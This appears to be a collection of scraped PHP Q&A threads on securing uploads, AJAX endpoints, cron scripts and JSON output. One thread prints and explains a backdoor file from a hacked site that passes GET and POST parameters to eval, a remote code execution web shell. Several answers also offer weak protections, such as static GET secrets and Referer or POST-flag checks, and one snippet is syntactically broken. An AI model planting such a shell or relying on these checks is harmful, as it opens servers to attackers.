I am trying to write a script for uploading large files (>500MB). I would like to do some authentication before the upload is processed, eg:
$id = $_GET['key'];
$size = $_GET['size'];
$time = $_GET['time'];
$signature = $_GET['signature'];
$secret = 'asdfgh123456';
if(sha1($id.$size.$time.$secret) != $signature){
echo 'invalid signature';
exit;
}
process upload...
unfortunately php only runs this code after the file has been uploaded to a temp directory, taking up valuable server resources. Is there a way to do this before the upload happens? I have tried similar things with perl/cgi but the same thing happens.
Wow, already 5 answers telling how it can't be done. mod_perl to the rescue, here you can reject a request before the whole request body is uploaded.
Apache is taking care of the upload before the PHP script is even invoked so you won't be able to get at it.
You can either split up the process into two pages (authentication, file upload page) or, if you need to do it all in one page, use an AJAX-esque solution to upload the file after authentication parameters are checked.
As far as I know, you cannot do that in PHP. PHP script is launched in response to a request, but a request is not "sent" until the file is uploaded, since the file being uploaded is a part of the request.
This is definitely not possible inside the PHP script you're uploading to.
The most simple possibility is indeed to provide authentication one step before the upload takes place.
If that is not an option, one slightly outlandish possibility comes to mind - using a RewriteMap and mapping it to an external program (it should be possible to make that program a PHP script).
Using RewriteMap it is possible to rewrite an URL based on the output of a command line program. If you use this directive to call a (separate) PHP script - you won't be able to use the user's session, though! - you would have access to the GET parameters before the request is processed.
If the processing fails (= the credentials are invalid), you could redirect the request to a static resource which would at least prevent PHP from starting up. (I assume the uploaded will be hogging some resources anyway, but probably less than if it were redirected to PHP.)
No guarantees whether this'll work! I have no own experience with RewriteMap.
This is due to the fact that each HTTP request is a single contains all the of form/POST data, including the file upload data.
As such, I don't believe it's possible to handle a file upload request in this fashion irrespective of which scripting language you use.
I don't think you can do this. The best you can do is probably to run an AJAX function onSubmit to do your validation first, then if it returns valid then execute the POST to upload the file. You could set a $_SESSION in your AJAX script if the authentication is valid, then check for that session var in the upload script to allow the upload.
Related
I have a massive of scripts that my core application
include('JS/gramp.php');
include('JS/est.php');
include('JS/curest.php');
include('JS/memomarker.php');
include('JS/local----------.php');
include('JS/poirel.php');
include('JS/maplayers.php');
include('JS/trafficinc.php');
include('JS/plannedtraffic.php');
include('JS/transportissues.php');
include('JS/cams_traff.php');
include('JS/places2.php');
Now these are all being moved to a on the fly loading, to reduce the size of the application on load
if(button_case_curtime==true){
$(".jsstm").load("<?php echo $core_dir; ?>JS/curresttime.php?la=<?php echo $caseset['iplat']; ?>&lo=<?php echo $caseset['iplong']; ?>&h=<?php echo $days_h; ?>");
rendermap = true;
}
issue! the application requires these files to be secure, the data involved requires that no one can access.
The ONLY file that will ever request these files will be index.php
Any input or idears would be fantastic!
There is no way to provide a file to the browser without also providing it to a user.
You could configure your server to only supply the files given an extra HTTP header (which you could add with JS), but nothing would stop people from sending that header manually or just digging the source out of the browser's debugging tools.
Any user you give the files to will have access to the files. If you want to limit which users have access to them, then you have to use auth/authz (which you'll want to apply to the index.php file as well so that unauthorised users don't just get JS errors or silent failure states).
No. What you are trying to do is not possible. Ajax requests are not special. They are just HTTP requests. End points created for Ajax should be secured with authentication/authorization just like any other HTTP request end point.
This is a trivial solution that will solve your problem half-way. Request them via a POST request, like so:
$.post('JS/maplayers.php', {'ajax':true}, function(){});
Notice the POST variable 'ajax'. In the file maplayers.php, add to the beginning the following code:
if((!isset($_POST['ajax']))) {
die('Invalid request, only ajax requests are permitted');
}
I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.
It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval
I have a page that I want to execute via cron. It just does some pretty simple archiving stuff, nothing super high-security, no DB access etc.
Is it a secure practice to simply require a GET var to be present in order to execute the page? So myarchiver.php would be something like:
<?php
$mysecret_word = "abc123";
if ($_GET['secret'] == $mysecret_word){
// execute my stuff here
}
Then you'd just call myarchiver.php?secret=abc123 in the crontab and the process would run, while any wrong answer or attempt to execute the page with no secret would simply present a blank page (with no extra server load).
I realize this is not "secure" against man in the middle attacks and if the site was compromised-- but I believe in general it's plenty secure to keep this script from being fired by random script kiddies and other idiots who may somehow know about its existence? The thing I'm guarding against is random malicious users who may know about this script bombarding it with requests in order to dos/tie up resources.
EDIT TO ADD: the server is not accessible via SSH and the cron is being executed on a remote machine-- so it must be done via an http request.
Thanks for input.
If this script is never going to be run from the browser, you should place the file outside of your web root directory where browsers cannot reach it and just have your cron run the script at the alternate location. It would definitely be the most secure way to do it.
If you're on a shared hosting environment, you may need browser access for manual running. I would just use SSH to manually run the file from its location since it only takes me a couple seconds to login to SSH and get to the directory. Personally, I just prefer not to have excess pages laying around on my website.
First off, why not just check the IP address of the server making the request?
If it has to be done via an HTTP request and simply checking the IP address isn't an option, you can have your cron run a script similar to "runcron.php". That script would in turn make a CURL or WGET request to the actual cron script you want to run.
That would allow you to pass a dynamic hash instead of a static key. That would prevent someone from just repeating the HTTP request if they happen to sniff the traffic. For the hash you could use anything dynamic like the date combined with a salt.
Example:
if (md5('secretword') . date('H')) == $_GET['hash']) { // do cron }
That would at least rotate your key once an hour.
Also, crontab won't let you pass GET variables. You'll have to do this -
/usr/bin/php /home/blah.php hello
Then in the script -
$argv = $_SERVER['argv'];
echo $argv[1];
Someone correct me if I'm mistaken.
This is a technique that facebook uses on their logout.php file, so that if someone sends a link to logout.php it won't log them out. I would recommend doing this.
$mysecret_word = "abc123";
if ($_GET['asd2edxc32cwqcxad'] === $mysecret_word){
// execute my stuff here
} else {
error_log('oopis');
header('HTTP/1.0 404 Not Found');
die();
}
I have a flash upload script, that uses a .php file as the processor. I need the processor file to set a cookie with a gallery ID that was created by php script, and pass it on to the confirmation page. Except when Flash runs the php file... it doesnt set the cookie. It does set the session variable, which was good enough, but now Im using lighttpd for the site (including the confirmation page) and apache for the actual uploader processor script (because lighttps sucks at uploading large files), so the session vars don't get transferred between the 2 server software.
How can I transfer a variable from the php processor (running on apache) to a confirmation page running lighttpd?
Well I would assume that it doesn't set a cookie as it was called by a flash script not a browser, and cookies are stored by the browser.
The only ways I can think of are a mysql database, or simply a text file.
Just thought of a second solution which is probably less efficient than Nico's but may be better suited to you. If the cookie being sent to Flash isn't being sent to the browser also, you could use Flash's ExternalInterface class to pass the contents of the cookie to a javascript function which would set the cookie in the browser. Or you could call a javascript function which will make an AJAX call to fetch the contents of the cookie.
Not sure if we're doing the same thing, but I had a similar problem, not being able to set a cookie from a php script run through flash. However I later realized it failed because I was missing arguments.
flash.swf:
sendToURL('script.php?val=dataFromFlash');
script.php:
//setcookie('flashData', $_GET['val']); //this did not work
setcookie('flashData', $_GET['val'], '0', '/'); //this worked
The PHP manual says that only the name argument is required, but I had to specify the expire and date arguments to get this to work. Perhaps this is because, as Nico's answer indicates, it is not sent through a browser? Anyway, hope this helps.
here find best solution for store all upload images data in flex with php script
$array = array();
$array["large_filename"] = $image_file_name;
$array["large_path"] = DIR_WS_IMAGES_TEMPIMAGES . $image_file_name;
$setcookie = serialize($array); setcookie( "ImageCookie",
$setcookie, time()+(60*60*24*15) );
one of my php page returns data like this:
<?php
//...
echo "json string";
?>
but someone else use file_get_contents() to get my data and use in other website.
can anybody tell me what can i do to prevent such thing happen.
i consider if i can get the request's domain name to echo something else.but i dont know
the function to get request's domain name.and if the request is sent by a server,that
will be unhelpful. My English is poor, to express doubts, please bear with.
you can also use sessions. if somewhere in your application, before the user gets the json data, you start a session, then in this page where you are outputting json data, you can check for the session variable. this way only users that have passed the session generator page, can view your output.
suppose you have page A.php that generates the session. use this code before outputting anything in this page.
session_start();
$_SESSION['approvedForJson'] = true;
then in your page where you are outputting json data, before outputting anything, call session_start() again. the beginning of your PHP code is a good place to call it.
then before outputting the json data, check if the session variable for approved users exists, or not.
if ( isset($_SESSION['approvedForJson']) && $_SESSION['approvedForJson'] ) {
echo "json data";
} else {
// bad request
}
You can use $_SERVER['REMOTE_ADDR'] to get the address of the client address. You can also check $_SERVER['HTTP_REFERER'] and block external requests that way, but it's less reliable. There's probably a few other techniques involving $_SERVER that you can try.
Your fighting an uphill battle here. I am assuming your serverside process that responds in json is being consumed via javascript in your users browsers... so there is no easy way to encrypt it. You might try some of the techniques used to prevent xspf (see http://en.wikipedia.org/wiki/Cross-site_request_forgery ). If you developed the client to pass along some session token that is uniq per client you could reduce some of the problem. But, chances are whoever is stealing your data is gonna figure out whatever mechanism you put in place ... assuming this is some sort of ajax type thing. If its a server-server thing then as sli mentions, setting up some restrictions based on the remote ip would help, plus setting up some sort of API authentication tokens would help even more (see oauth for some pointers)
You could also using .htaccess with apache block every external request to the page if it get's called internally or block every request that is not from your domain:
Google search thingie
EDIT
You could also use some php file which includes the file which can not be read. So for example you have file.php:
<?php
$allowedFiles[] = 'somefile.php';
$allowedFiles[] = 'someotherFile.php';
$allowedFiles[] = 'jsonReturnFile.php';
if(in_array($_GET['file'], $allowedFiles)){
include( "include/".$_GET['file'] );
}
?>
Then you can allow file_ get _contents() on that file and write a rewriteRule in your .htacces to disallow any request to the include/ folder.
RewriteRule include* - [F,NC]
That will return a 403 forbidden error for a request to that directory or any file in the directory.
Then you can do you JSON request to something like: file.php?file=jsonReturnFile.php&someothherParamReadByJsonFile=1
And when someone tries to get the file contents for the JSON file they will get the forbidden error, and getting the file contents for the include.php won't return anything usefull.